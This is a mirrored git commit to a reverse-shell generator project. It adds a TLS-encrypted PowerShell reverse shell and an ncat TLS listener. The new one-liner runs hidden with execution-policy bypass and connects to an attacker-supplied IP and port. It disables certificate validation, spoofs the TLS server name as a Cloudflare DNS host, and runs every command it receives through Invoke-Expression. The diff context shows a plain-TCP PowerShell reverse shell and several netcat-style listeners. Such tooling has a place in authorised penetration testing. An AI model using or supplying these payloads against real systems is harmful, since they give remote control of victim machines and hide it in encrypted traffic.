mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 10:56:10 +00:00
Added PowerShell #4 TLS, and ncat TLS listerner
Based on https://github.com/MartinSohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell-DNS-TLS.ps1
This commit is contained in:
parent
cb2d5ae74b
commit
eb673a55f3
@ -169,6 +169,11 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
"name": "PowerShell #4 (TLS)",
|
||||
"command": "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
"name": "PowerShell #3 (Base64)",
|
||||
"meta": ["windows"]
|
||||
@ -358,6 +363,7 @@ const rsgData = {
|
||||
listenerCommands: [
|
||||
['nc', 'nc -lvnp {port}'],
|
||||
['ncat', 'ncat -lvnp {port}'],
|
||||
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
|
||||
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
|
||||
['pwncat', 'python3 -m pwncat -lp {port}'],
|
||||
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
|
||||
|
Loading…
Reference in New Issue
Block a user